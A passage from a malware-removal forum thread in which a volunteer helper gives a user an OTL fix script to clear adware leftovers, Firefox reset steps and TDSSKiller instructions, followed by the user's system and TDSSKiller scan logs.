"ESET Online Scanner" = ESET Online Scanner v3
"Farm Mania_is1" = Farm Mania
"Google Chrome" = Google Chrome
"HDMI" = Intel® Graphics Media Accelerator Driver
"HP Imaging Device Functions" = HP Imaging Device Functions 14.0
"HP Photo Creations" = HP Photo Creations
"HP Smart Web Printing" = HP Smart Web Printing 4.60
"HP Solution Center & Imaging Support Tools" = HP Solution Center 14.0
"HPExtendedCapabilities" = HP Customer Participation Program 14.0
"IDNMitigationAPIs" = Microsoft Internationalized Domain Names Mitigation APIs
"ie7" = Windows Internet Explorer 7
"InstallShield_{0CB98AC0-D691-4B21-AD3D-95982517021D}" = Acer WLAN 11g USB Dongle
"InstallShield_{1577A05B-EE62-4BBC-9DB7-FE748FA44EC2}" = NTI CD & DVD-Maker
"InstallShield_{385979FE-DC4F-4140-8EAD-A59625000D72}" = NTI Backup NOW! 4
"InstallShield_{652C4ADF-0A29-4B02-9211-EE61675847DE}" = Canon EOS-1Ds Mark II WIA Driver
"InstallShield_{74BE7519-41A7-45A8-8AA6-78C7907A4808}" = Canon Utilities EOS Capture 1.2
"InstallShield_{750CF8D7-4B04-404F-AFA2-14C129C42373}" = Canon Utilities EOS Viewer Utility 1.2
"InstallShield_{C537C86E-22C0-41CF-8A8E-3B23E986C3D9}" = Canon EOS-1D Mark II WIA Driver
"InstallShield_{ED9775A0-383E-4EAA-8DA5-8CC6860D60A3}" = Canon EOS 20D WIA Driver
"LiveUpdate" = LiveUpdate 3.0 (Symantec Corporation)
"Lode Runner_is1" = Lode Runner 2.0
"Mad About Cats" = Mad About Cats
"Microsoft .NET Framework 1.1  (1033)" = Microsoft .NET Framework 1.1
"Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1
"Microsoft .NET Framework 4 Client Profile" = Microsoft .NET Framework 4 Client Profile
"MovieEditTask" = Canon MovieEdit Task for ZoomBrowser EX
"Mozilla Firefox 31.0 (x86 en-US)" = Mozilla Firefox 31.0 (x86 en-US)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"MSCompPackV1" = Microsoft Compression Client Pack 1.0 for Windows XP
"NLSDownlevelMapping" = Microsoft National Language Support Downlevel APIs
"OcaHistoryUpd" = OCA Client history tool install
"Original Data Security Tools" = Canon Utilities Original Data Security Tools
"PhotoStitch" = Canon Utilities PhotoStitch
"Picture Style Editor" = Canon Utilities Picture Style Editor
"PROHYBRIDR" = 2007 Microsoft Office system
"QwestQuickCare_is1" = Qwest QuickCare 2.2
"Revo Uninstaller" = Revo Uninstaller 1.93
"Settings Manager" = Settings Manager
"SmartFTP Client 3.0 Setup Files" = SmartFTP Client 3.0 Setup Files (remove only)
"Starcraft" = Starcraft
"TurboTax 2010" = TurboTax 2010
"TurboTax 2011" = TurboTax 2011
"VOPackage" = Remote Desktop Access (VuuPC)
"WFTK" = Canon Utilities WFT Utility
"Windows Media Format Runtime" = Windows Media Format 11 runtime
"Windows Media Player" = Windows Media Player 11
"Windows XP Service Pack" = Windows XP Service Pack 3
"WinRAR archiver" = WinRAR archiver
"WMFDist11" = Windows Media Format 11 runtime
"wmp11" = Windows Media Player 11
"Wudf01000" = Microsoft User-Mode Driver Framework Feature Pack 1.0
"ZoomBrowser EX" = Canon Utilities ZoomBrowser EX
"ZoomBrowser EX Memory Card Utility" = Canon ZoomBrowser EX Memory Card Utility
 
========== HKEY_CURRENT_USER Uninstall List ==========
 
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{373B1718-8CC5-4567-8EE2-9033AD08A680}" = ROBLOX Player for Jay
"FileZilla Client" = FileZilla Client 3.1.1.1
"Linkey" = Linkey
"Spotify" = Spotify
 
========== Last 20 Event Log Errors ==========
 
[ Application Events ]
Error - 8/25/2014 8:40:23 PM | Computer Name = MOLES | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 2782
 
Error - 8/25/2014 8:40:23 PM | Computer Name = MOLES | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 2782
 
Error - 8/26/2014 6:38:35 PM | Computer Name = MOLES | Source = PerfNet | ID = 2002
Description = Unable to open the Redirector service. Redirector performance data
will
 not be returned. Error code returned is in data DWORD 0.
 
Error - 8/28/2014 10:26:06 PM | Computer Name = MOLES | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: Continuously busy for more than a second
 
Error - 8/28/2014 10:26:06 PM | Computer Name = MOLES | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 95025469
 
Error - 8/28/2014 10:26:06 PM | Computer Name = MOLES | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 95025469
 
Error - 8/28/2014 10:56:08 PM | Computer Name = MOLES | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: Continuously busy for more than a second
 
Error - 8/28/2014 10:56:08 PM | Computer Name = MOLES | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 15609
 
Error - 8/28/2014 10:56:08 PM | Computer Name = MOLES | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 15609
 
Error - 8/29/2014 7:49:27 PM | Computer Name = MOLES | Source = PerfNet | ID = 2002
Description = Unable to open the Redirector service. Redirector performance data
will
 not be returned. Error code returned is in data DWORD 0.
 
[ OSession Events ]
Error - 11/15/2013 10:21:40 AM | Computer Name = MOLES | Source = Microsoft Office 12 Sessions | ID = 7001
Description = ID: 0, Application Name: Microsoft Office Word, Application Version:
 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 240120
 seconds with 2700 seconds of active time.  This session ended with a crash.
 
[ System Events ]
Error - 8/29/2014 7:49:09 PM | Computer Name = MOLES | Source = Service Control Manager | ID = 7024
Description = The Workstation service terminated with service-specific error 2250
 (0x8CA).
 
Error - 8/29/2014 7:49:09 PM | Computer Name = MOLES | Source = Service Control Manager | ID = 7001
Description = The Computer Browser service depends on the Workstation service which
 failed to start because of the following error:   %%1066
 
Error - 8/29/2014 7:49:09 PM | Computer Name = MOLES | Source = Service Control Manager | ID = 7000
Description = The SmdmF Service service failed to start due to the following error:
   %%2
 
Error - 8/29/2014 7:49:18 PM | Computer Name = MOLES | Source = Service Control Manager | ID = 7026
Description = The following boot-start or system-start driver(s) failed to load:
   F06DEFF2-5B9C-490D-910F-35D3A9119622
 
Error - 8/29/2014 7:49:22 PM | Computer Name = MOLES | Source = Workstation | ID = 5727
Description = Could not load RDR device driver.
 
Error - 8/29/2014 7:49:22 PM | Computer Name = MOLES | Source = Workstation | ID = 5727
Description = Could not load RDR device driver.
 
Error - 8/29/2014 7:49:23 PM | Computer Name = MOLES | Source = Service Control Manager | ID = 7001
Description = The Computer Browser service depends on the Workstation service which
 failed to start because of the following error:   %%1066
 
Error - 8/29/2014 7:49:23 PM | Computer Name = MOLES | Source = Service Control Manager | ID = 7024
Description = The Workstation service terminated with service-specific error 2250
 (0x8CA).
 
Error - 8/29/2014 7:49:23 PM | Computer Name = MOLES | Source = Service Control Manager | ID = 7001
Description = The Computer Browser service depends on the Workstation service which
 failed to start because of the following error:   %%1066
 
Error - 8/29/2014 7:49:23 PM | Computer Name = MOLES | Source = Service Control Manager | ID = 7024
Description = The Workstation service terminated with service-specific error 2250
 (0x8CA).
 
 
< End of report >


 

Attached Files



#10 Starbuck

Starbuck

    'r Brudiwr


  • Malware Response Team
  • 4,149 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Midlands, UK
  • Local time:02:24 PM

Posted 30 August 2014 - 02:40 AM

Hi rockgremlin

A little more work for you :)

Please turn off Avast Internet security before running the Otl fix.
You can turn it back on after the fix has run.

Step 1
Double click on OTL to run it.
Vista/Windows 7 users right-click and select Run As Administrator.
Copy the lines in the codebox below. (make sure that :Otl is on the first line and that you include all of the Commands section )
:Otl
SRV - (SmdmFService) -- C:\Program Files\Settings Manager\smdmf\SmdmFService.exe File not found
SRV - (Amazon Download Agent) -- C:\Program Files\Amazon\Amazon Games & Software Downloader\AmazonGSDownloaderService.exe File not found
DRV - (WDICA) --  File not found
DRV - (PDRFRAME) --  File not found
DRV - (PDRELI) --  File not found
DRV - (PDFRAME) --  File not found
DRV - (PDCOMP) --  File not found
DRV - (PCIDump) --  File not found
DRV - (lbrtfdc) --  File not found
DRV - (i2omgmt) --  File not found
DRV - (F06DEFF2-5B9C-490D-910F-35D3A9119622) -- C:\Program Files\Settings Manager\smdmf\smdmfmgrc2.cfg File not found
DRV - (Changer) --  File not found
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0015-0000-0006-ABCDEFFEDCBA} Reg Error: Value error. (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0016-0000-0001-ABCDEFFEDCBA} Reg Error: Value error. (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA} Reg Error: Value error. (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA} Reg Error: Value error. (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA} Reg Error: Value error. (Reg Error: Key error.)
O36 - AppCertDlls: x64 - (c:\program files\settings manager\smdmf\x64\sysapcrt.dll) -  File not found
O36 - AppCertDlls: x86 - (c:\program files\settings manager\smdmf\sysapcrt.dll) -  File not found
[2012/10/16 01:38:42 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Jay\Application Data\Azureus

:Files
ipconfig /flushdns /c

:commands
[emptytemp]
[purity]

  • Return to OTL,
  • right click in the Custom Scans/Fixes window (under the blue bar) and choose Paste.

    scan-fix.png
  • Click the red Run Fix button.

    runfixbutton.png
  • OTL will reboot your system once the fix has completed.
  • After the reboot, you may need to double click OTL to launch the program and retrieve the log.
Copy and paste the contents of the OTL log that comes up after the fix in your next reply.

if you lose the report, there will be a copy here:
C:\_OTL\MovedFiles



Step 2
Please Reset Firefox
  • At the top of the Firefox window, click the Help menu and select Troubleshooting Information
  • Click the Reset Firefox button in the upper-right corner of the Troubleshooting Information page.
  • To continue, click Reset Firefox in the confirmation window that opens.
  • Firefox will close and be reset. When it's done, a window will list the information that was imported.
  • Click Finish and Firefox will open.
Note:
After the reset is finished, your old Firefox profile information will be placed on your desktop in a folder named "Old Firefox Data." If the reset didn't fix your problem you can restore some of the information not saved by copying files to the new profile that was created.
If you don't need this folder any longer, you should delete it as it contains sensitive information.

The reset feature works by creating a new profile folder for you while saving your most important data.

Firefox will try to keep the following data:
  • Bookmarks
  • Browsing history
  • Passwords
  • Cookies
  • Web form auto-fill information
  • Personal dictionary
Step 3
Remove your copy of TDSSKiller ( if still on your system)
Right click on the icon and select delete.
Now let's get and run a fresh copy.

Download TDSSKiller and save it to your Desktop.
  • Doubleclick on TDSSKiller.exe to run the application, then click on Change parameters.

    tdss_1.jpg
  • Check the boxes beside Verify Driver Digital Signature and Detect TDLFS file system, then click OK.

    tdss_2.jpg
  • Click the Start Scan button.

    tdss_3.jpg
  • If a suspicious object is detected, the default action will be Skip, click on Continue.

    tdss_4.jpg
  • If malicious objects are found, they will show in the Scan results and offer three (3) options.
  • Ensure SKIP is selected, then click Continue => Reboot now to finish the cleaning process.

    tdss_5.jpg
  • Note: Do not choose Delete unless instructed.
A report will be created in your root directory, (usually C:\ folder) in the form of "TDSSKiller.[Version]_[Date]_[Time]_log.txt". Please copy and paste its contents on your next reply.



In your next reply, please submit:
Otl fix report
TdssKiller report.


Thanks.

BBPP6nz.png


#11 rockgremlin

rockgremlin
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:02:24 PM

Posted 09 September 2014 - 09:32 PM

OK,

 

Check & Check....

 

 

Oddly, it wouldn't allow me to upload the TDS log, claiming that it was too big to upload (it was only 138kb...?), so I'm pasting it into this post:

 

 

20:16:33.0156 0x07ac  TDSS rootkit removing tool 3.0.0.40 Jul 10 2014 12:37:58
20:16:36.0484 0x07ac  ============================================================
20:16:36.0484 0x07ac  Current date / time: 2014/09/09 20:16:36.0484
20:16:36.0484 0x07ac  SystemInfo:
20:16:36.0484 0x07ac  
20:16:36.0484 0x07ac  OS Version: 5.1.2600 ServicePack: 3.0
20:16:36.0484 0x07ac  Product type: Workstation
20:16:36.0484 0x07ac  ComputerName: MOLES
20:16:36.0484 0x07ac  UserName: Jay
20:16:36.0484 0x07ac  Windows directory: C:\WINDOWS
20:16:36.0484 0x07ac  System windows directory: C:\WINDOWS
20:16:36.0484 0x07ac  Processor architecture: Intel x86
20:16:36.0484 0x07ac  Number of processors: 2
20:16:36.0484 0x07ac  Page size: 0x1000
20:16:36.0484 0x07ac  Boot type: Normal boot
20:16:36.0484 0x07ac  ============================================================
20:16:38.0859 0x07ac  KLMD registered as C:\WINDOWS\system32\drivers\78521656.sys
20:16:38.0968 0x07ac  System UUID: {10646453-9EAF-5A04-17E5-37A5C35426A9}
20:16:39.0687 0x07ac  Drive \Device\Harddisk0\DR0 - Size: 0x2658AE0000 ( 153.39 Gb ), SectorSize: 0x200, Cylinders: 0x4E37, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000054
20:16:39.0703 0x07ac  ============================================================
20:16:39.0703 0x07ac  \Device\Harddisk0\DR0:
20:16:39.0703 0x07ac  MBR partitions:
20:16:39.0703 0x07ac  \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x9C263D, BlocksNum 0x8FADA22
20:16:39.0703 0x07ac  \Device\Harddisk0\DR0\Partition2: MBR, Type 0xC, StartLBA 0x997005F, BlocksNum 0x90A8A62
20:16:39.0703 0x07ac  ============================================================
20:16:39.0750 0x07ac  C: <-> \Device\Harddisk0\DR0\Partition1
20:16:39.0765 0x07ac  D: <-> \Device\Harddisk0\DR0\Partition2
20:16:39.0765 0x07ac  ============================================================
20:16:39.0765 0x07ac  Initialize success
20:16:39.0765 0x07ac  ============================================================
20:16:51.0718 0x0ae0  ============================================================
20:16:51.0718 0x0ae0  Scan started
20:16:51.0718 0x0ae0  Mode: Manual; SigCheck; TDLFS;
20:16:51.0718 0x0ae0  ============================================================
20:16:51.0718 0x0ae0  KSN ping started
20:16:54.0375 0x0ae0  KSN ping finished: true
20:16:55.0703 0x0ae0  ================ Scan system memory ========================
20:16:55.0703 0x0ae0  System memory - ok
20:16:55.0703 0x0ae0  ================ Scan services =============================
20:16:55.0765 0x0ae0  [ C0393EB99A6C72C6BEF9BFC4A72B33A6, 72BF029C6A37DE131FFD61C2374C8920556236218613E37B5F348AA89FA12E42 ] !SASCORE        C:\Program Files\SUPERAntiSpyware\SASCORE.EXE
20:16:56.0109 0x0ae0  !SASCORE - detected UnsignedFile.Multi.Generic ( 1 )
20:16:58.0765 0x0ae0  Detect skipped due to KSN trusted
20:16:58.0765 0x0ae0  !SASCORE - ok
20:16:59.0937 0x0ae0  Abiosdsk - ok
20:16:59.0953 0x0ae0  abp480n5 - ok
20:17:00.0031 0x0ae0  [ 8FD99680A539792A30E97944FDAECF17, 594F8E0C3695400B0C09A797AF6BDFAC6F750ECD67D0EE803914C572B1DCC43C ] ACPI            C:\WINDOWS\system32\DRIVERS\ACPI.sys
20:17:04.0984 0x0ae0  ACPI - ok
20:17:05.0015 0x0ae0  [ 9859C0F6936E723E4892D7141B1327D5, 5E8F6A2FC4DF2E5E92A1D66ECC2810E08B42B64E9CD0DF4AD3F78EA8558B90AF ] ACPIEC          C:\WINDOWS\system32\drivers\ACPIEC.sys
20:17:05.0187 0x0ae0  ACPIEC - ok
20:17:05.0359 0x0ae0  [ FBB312C9DA3863673EC18F4AE4101778, 4E9AAE7C700E485C17FDFCC9100A79784673B006D00D4D4CE8F1DB617D25C864 ] AdobeFlashPlayerUpdateSvc C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
20:17:05.0390 0x0ae0  AdobeFlashPlayerUpdateSvc - ok
20:17:05.0421 0x0ae0  adpu160m - ok
20:17:05.0468 0x0ae0  [ 8BED39E3C35D6A489438B8141717A557, 1B5796E56B0927360CE0759641B1151828BC0A9E45620D2B2D880491F5CE33D0 ] aec             C:\WINDOWS\system32\drivers\aec.sys
20:17:05.0671 0x0ae0  aec - ok
20:17:05.0718 0x0ae0  [ 1E44BC1E83D8FD2305F8D452DB109CF9, CF5EC07E0B589FA2A4701C6CFD69E893FC3ABF274AD57AE3C13FFE49063B02C8 ] AFD             C:\WINDOWS\System32\drivers\afd.sys
20:17:05.0781 0x0ae0  AFD - ok
20:17:05.0781 0x0ae0  Aha154x - ok
20:17:05.0796 0x0ae0  aic78u2 - ok
20:17:05.0796 0x0ae0  aic78xx - ok
20:17:05.0828 0x0ae0  [ A9A3DAA780CA6C9671A19D52456705B4, 67C959144B57AE0BBF1D82DBED197F32CDB06FECD883A80C441A0202FE83FAB4 ] Alerter         C:\WINDOWS\system32\alrsvc.dll
20:17:06.0000 0x0ae0  Alerter - ok
20:17:06.0046 0x0ae0  [ 8C515081584A38AA007909CD02020B3D, A5E13CA10F702928E0DE84C74D0EA8ACCB117FD76FBABC55220C75C4FFD596DC ] ALG             C:\WINDOWS\System32\alg.exe
20:17:06.0234 0x0ae0  ALG - ok
20:17:06.0234 0x0ae0  AliIde - ok
20:17:06.0250 0x0ae0  amsint - ok
20:17:06.0375 0x0ae0  [ A5299D04ED225D64CF07A568A3E1BF8C, 6F7E73893127BADC8C9815E9BCC0EB5F6584E254D0D09A0B6A680704C71E0A90 ] Apple Mobile Device C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
20:17:06.0421 0x0ae0  Apple Mobile Device - ok
20:17:06.0484 0x0ae0  [ D8849F77C0B66226335A59D26CB4EDC6, 4990031453204C57E36E850252A39B05D6ECDAB9E71A8136FB4900F17E59C9CA ] AppMgmt         C:\WINDOWS\System32\appmgmts.dll
20:17:06.0718 0x0ae0  AppMgmt - ok
20:17:06.0750 0x0ae0  [ B5B8A80875C1DEDEDA8B02765642C32F, AD0C71D73B1B8225351FBF4FFB43001A32B4DAE69504C59970CD2428BB33D4EF ] Arp1394         C:\WINDOWS\system32\DRIVERS\arp1394.sys
20:17:07.0062 0x0ae0  Arp1394 - ok
20:17:07.0078 0x0ae0  asc - ok
20:17:07.0078 0x0ae0  asc3350p - ok
20:17:07.0093 0x0ae0  asc3550 - ok
20:17:07.0203 0x0ae0  [ 0E5E4957549056E2BF2C49F4F6B601AD, F7F19FDC906B719A3516D30A9B4A2262C8CC5B36B94E3D4195C345EC4610FF2B ] aspnet_state    C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
20:17:07.0218 0x0ae0  aspnet_state - ok
20:17:07.0265 0x0ae0  [ B153AFFAC761E7F5FCFA822B9C4E97BC, 7E60F572A6B3C6219E3C86225AA37243AFFD74337DB7F108B04778042E5CC959 ] AsyncMac        C:\WINDOWS\system32\DRIVERS\asyncmac.sys
20:17:07.0468 0x0ae0  AsyncMac - ok
20:17:07.0500 0x0ae0  [ 9F3A2F5AA6875C72BF062C712CFA2674, B4DF1D2C56A593C6B54DE57395E3B51D288F547842893B32B0F59228A0CF70B9 ] atapi           C:\WINDOWS\system32\DRIVERS\atapi.sys
20:17:07.0734 0x0ae0  atapi - ok
20:17:07.0734 0x0ae0  Atdisk - ok
20:17:07.0796 0x0ae0  [ 9916C1225104BA14794209CFA8012159, 5D6F05F715C52A16D05CAE15C3DFE77A139A7F27F7AE710EC9A10F9EE05115A1 ] Atmarpc         C:\WINDOWS\system32\DRIVERS\atmarpc.sys
20:17:08.0078 0x0ae0  Atmarpc - ok
20:17:08.0109 0x0ae0  [ DEF7A7882BEC100FE0B2CE2549188F9D, 462C95B63D0A1058291A2DC8CBFCB13D7D74CCD1CA43B613A7EB43D49E3276F8 ] AudioSrv        C:\WINDOWS\System32\audiosrv.dll
20:17:08.0312 0x0ae0  AudioSrv - ok
20:17:08.0359 0x0ae0  [ D9F724AA26C010A217C97606B160ED68, 329B5118F2409731D06FDAE85B6ADD64A048292801BCB3546651CEB303111695 ] audstub         C:\WINDOWS\system32\DRIVERS\audstub.sys
20:17:08.0515 0x0ae0  audstub - ok
20:17:08.0640 0x0ae0  [ A2494901E7226B356B8C1005C45F1C5F, A4A7076D40B012BB415C4B661B8C45671B853330746E278D080EC96596EEECBE ] BBSvc           C:\Program Files\Microsoft\BingBar\7.1.361.0\BBSvc.exe
20:17:08.0671 0x0ae0  BBSvc - ok
20:17:08.0703 0x0ae0  [ 63B1CBBAE4790B5BAC98F01BF9449722, 0A49B9FCEF33B38132B0AB8A9D7591A46856E82BC2123841E27A895817D92695 ] BBUpdate        C:\Program Files\Microsoft\BingBar\7.1.361.0\SeaPort.exe
20:17:08.0750 0x0ae0  BBUpdate - ok
20:17:08.0796 0x0ae0  [ DA1F27D85E0D1525F6621372E7B685E9, 5A81A46A3BDD19DAFC6C87D277267A5D44F3A1B5302F2CC1111D84B7BAD5610D ] Beep            C:\WINDOWS\system32\drivers\Beep.sys
20:17:09.0031 0x0ae0  Beep - ok
20:17:09.0125 0x0ae0  [ 574738F61FCA2935F5265DC4E5691314, 3C7CCF064397186C3A3863DD2370AB6414A61B330097DCA4F299CA7BBAA3D1B4 ] BITS            C:\WINDOWS\system32\qmgr.dll
20:17:09.0500 0x0ae0  BITS - ok
20:17:09.0640 0x0ae0  [ DB5BEA73EDAF19AC68B2C0FAD0F92B1A, 10F21999FF6B1D410EBF280F7F27DEACA5289739CF12F4293B614B8FC6C88DCC ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe
20:17:09.0718 0x0ae0  Bonjour Service - ok
20:17:09.0765 0x0ae0  [ CFD4E51402DA9838B5A04AE680AF54A0, 5378F42B195B5832B00A05AD64E00473A45FFB86AC25C57241F26EA82B149FE1 ] Browser         C:\WINDOWS\System32\browser.dll
20:17:09.0843 0x0ae0  Browser - ok
20:17:09.0890 0x0ae0  [ 90A673FC8E12A79AFBED2576F6A7AAF9, BDE7858A3457DB979FEDD8577FA6321BF72848E4A7BF9F173C78A6A10CBB3EBE ] cbidf2k         C:\WINDOWS\system32\drivers\cbidf2k.sys
20:17:10.0062 0x0ae0  cbidf2k - ok
20:17:10.0078 0x0ae0  cd20xrnt - ok
20:17:10.0093 0x0ae0  [ C1B486A7658353D33A10CC15211A873B, AA4DD9E7AAE5AAB1146B360B17001F975D2F29A1281CF7B13E7136480410F347 ] Cdaudio         C:\WINDOWS\system32\drivers\Cdaudio.sys
20:17:10.0281 0x0ae0  Cdaudio - ok
20:17:10.0296 0x0ae0  [ C885B02847F5D2FD45A24E219ED93B32, B26B2F8E3A831E2B65EB0C5195B0645CD50E22615CE79C9B0B391CD563B121DB ] Cdfs            C:\WINDOWS\system32\drivers\Cdfs.sys
20:17:10.0468 0x0ae0  Cdfs - ok
20:17:10.0500 0x0ae0  [ 1F4260CC5B42272D71F79E570A27A4FE, B51C2A3ED3C309953D0EA45869C8E464C10F2533DADE9E0286AF674979098D1D ] Cdrom           C:\WINDOWS\system32\DRIVERS\cdrom.sys
20:17:10.0671 0x0ae0  Cdrom - ok
20:17:10.0703 0x0ae0  [ 1CFE720EB8D93A7158A4EBC3AB178BDE, 65D2A9D9A88F38D4AF323134C151BA0F4B3CD0F6A134AF86E7AC9D07319F1726 ] CiSvc           C:\WINDOWS\system32\cisvc.exe
20:17:10.0859 0x0ae0  CiSvc - ok
20:17:10.0875 0x0ae0  [ 34CBE729F38138217F9C80212A2A0C82, A9FD7A758D12E0818A11BEEF1CE772FEFA8373E92EF6C0DA8628CD4572CC9A43 ] ClipSrv         C:\WINDOWS\system32\clipsrv.exe
20:17:11.0109 0x0ae0  ClipSrv - ok
20:17:11.0140 0x0ae0  [ D87ACAED61E417BBA546CED5E7E36D9C, 14AC6034A5BC0FB2A1AFDAD42BEF4DE641556E54AD30D0C46765660A4BE55462 ] clr_optimization_v2.0.50727_32 C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
20:17:11.0171 0x0ae0  clr_optimization_v2.0.50727_32 - ok
20:17:11.0265 0x0ae0  [ C5A75EB48E2344ABDC162BDA79E16841, 6070A8AAFD38FBC6A68A2B10C20117612354DF21B4492D90CA522BFB6870D726 ] clr_optimization_v4.0.30319_32 C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
20:17:11.0296 0x0ae0  clr_optimization_v4.0.30319_32 - ok
20:17:11.0312 0x0ae0  CmdIde - ok
20:17:11.0328 0x0ae0  COMSysApp - ok
20:17:11.0375 0x0ae0  Cpqarray - ok
20:17:11.0421 0x0ae0  [ 3D4E199942E29207970E04315D02AD3B, 0825960894CF9C86CC8775BDD2A262948A09CA495AA7FE9F210FAF49E7086383 ] CryptSvc        C:\WINDOWS\System32\cryptsvc.dll
20:17:11.0609 0x0ae0  CryptSvc - ok
20:17:11.0609 0x0ae0  dac2w2k - ok
20:17:11.0625 0x0ae0  dac960nt - ok
20:17:11.0671 0x0ae0  [ 6B27A5C03DFB94B4245739065431322C, 6AEAC16AB4E0DFD25123AAF4D4181FEE1B919B7B2793117006CE8CF30E826CFD ] DcomLaunch      C:\WINDOWS\system32\rpcss.dll
20:17:11.0750 0x0ae0  DcomLaunch - ok
20:17:11.0796 0x0ae0  [ 5E38D7684A49CACFB752B046357E0589, F192AD4190BCFB6939A5CBC91648FE63168AF79A5E227A111DEAD6A92E42AB8D ] Dhcp            C:\WINDOWS\System32\dhcpcsvc.dll
20:17:12.0000 0x0ae0  Dhcp - ok
20:17:12.0031 0x0ae0  [ 044452051F3E02E7963599FC8F4F3E25, 584BDDB074618BE76454CF90E74829CFF588B5B5FAEB793E2F7AAD26352DD689 ] Disk            C:\WINDOWS\system32\DRIVERS\disk.sys
20:17:12.0187 0x0ae0  Disk - ok
20:17:12.0203 0x0ae0  dmadmin - ok
20:17:12.0265 0x0ae0  [ D992FE1274BDE0F84AD826ACAE022A41, C82BD6561A14F2932A761F5883A787B99031250EE5E9B7B5714AA045545C9B99 ] dmboot          C:\WINDOWS\system32\drivers\dmboot.sys
20:17:12.0437 0x0ae0  dmboot - ok
20:17:12.0484 0x0ae0  [ 7C824CF7BBDE77D95C08005717A95F6F, A73CB323B7A6410C3D3F258BF204E716ADF8C84C9E4F6562C57AB73DAED8CCDE ] dmio            C:\WINDOWS\system32\drivers\dmio.sys
20:17:12.0640 0x0ae0  dmio - ok
20:17:12.0687 0x0ae0  [ E9317282A63CA4D188C0DF5E09C6AC5F, D41E002F555FE9015EF620975255F58BB79198CA1FF0E09EC950CB450FF77CF7 ] dmload          C:\WINDOWS\system32\drivers\dmload.sys
20:17:12.0875 0x0ae0  dmload - ok
20:17:12.0906 0x0ae0  [ 57EDEC2E5F59F0335E92F35184BC8631, 61F6F0DC2D1A6C61D5EF0D5CC4BE0FFC217F1E61FDA3EA9F704709293656600F ] dmserver        C:\WINDOWS\System32\dmserver.dll
20:17:13.0125 0x0ae0  dmserver - ok
20:17:13.0140 0x0ae0  [ 8A208DFCF89792A484E76C40E5F50B45, 4E40E2EB38C6254E7CAA488200E89EE7DEBBBA773890BC6A84313CC68178D54F ] DMusic          C:\WINDOWS\system32\drivers\DMusic.sys
20:17:13.0312 0x0ae0  DMusic - ok
20:17:13.0343 0x0ae0  [ 5F7E24FA9EAB896051FFB87F840730D2, 356EEFDCD54DECAD0170B34B993E4BF80DD039E2B2922D7A8D09B84031E9FC7A ] Dnscache        C:\WINDOWS\System32\dnsrslvr.dll
20:17:13.0453 0x0ae0  Dnscache - ok
20:17:13.0531 0x0ae0  [ 0F0F6E687E5E15579EF4DA8DD6945814, 5C32D88119EB1465B2D719BEE2E05888D1A73454B5E33F2D4928DA710F8BFBA3 ] Dot3svc         C:\WINDOWS\System32\dot3svc.dll
20:17:13.0718 0x0ae0  Dot3svc - ok
20:17:13.0734 0x0ae0  dpti2o - ok
20:17:13.0765 0x0ae0  [ 8F5FCFF8E8848AFAC920905FBD9D33C8, C8C6FB97AB0871C8C88A2201525A5CF10D5131CB6980D32692ED7A8F58399AD5 ] drmkaud         C:\WINDOWS\system32\drivers\drmkaud.sys
20:17:14.0093 0x0ae0  drmkaud - ok
20:17:14.0125 0x0ae0  [ 2187855A7703ADEF0CEF9EE4285182CC, 8233CC11F637866C0074043835A785EA2B616739B6B1181B143A253CF2508CFD ] EapHost         C:\WINDOWS\System32\eapsvc.dll
20:17:14.0296 0x0ae0  EapHost - ok
20:17:14.0390 0x0ae0  [ FCE87BA643D5E9A8B6E0378508D1B22D, 45B278A763FB183B2B29AF2D2B9D790BA97A800644942AE4AFBBDCF2864B5AB2 ] eeCtrl          C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys
20:17:14.0468 0x0ae0  eeCtrl - ok
20:17:14.0531 0x0ae0  [ BC93B4A066477954555966D77FEC9ECB, 27F5B780175EF46DA102EE33F7F33559C8B40C077EEA4405D579D9507F4B1C23 ] ERSvc           C:\WINDOWS\System32\ersvc.dll
20:17:14.0687 0x0ae0  ERSvc - ok
20:17:14.0734 0x0ae0  [ 65DF52F5B8B6E9BBD183505225C37315, 59C606977DB40A3443DFF0BE2A4C761824881B22C9FDB3D23F6486DB580E92A4 ] Eventlog        C:\WINDOWS\system32\services.exe
20:17:14.0765 0x0ae0  Eventlog - ok
